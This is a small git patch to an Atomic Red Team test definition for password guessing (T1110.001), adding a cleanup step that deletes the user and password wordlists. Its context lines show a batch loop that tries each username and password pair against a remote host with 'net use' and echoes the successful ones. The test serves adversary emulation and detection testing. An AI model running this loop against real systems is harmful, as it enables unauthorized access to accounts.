From 248d2ed9ccbf45a4bbed5ae8143f2581f5779cc1 Mon Sep 17 00:00:00 2001
From: mhaag-spl <5632822+MHaggis@users.noreply.github.com>
Date: Thu, 24 Jun 2021 15:01:42 -0600
Subject: [PATCH] Update T1110.001.yaml

Resolving #1423
---
 atomics/T1110.001/T1110.001.yaml | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 9cec219a..3cd7f88a 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -32,6 +32,9 @@ atomic_tests:
       echo "1q2w3e4r" >> #{input_file_passwords}
       echo "Password!" >> #{input_file_passwords}
       @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+    cleanup_command: |-
+      del #{input_file_users}
+      del #{input_file_passwords}
 - name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
   auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
   description: |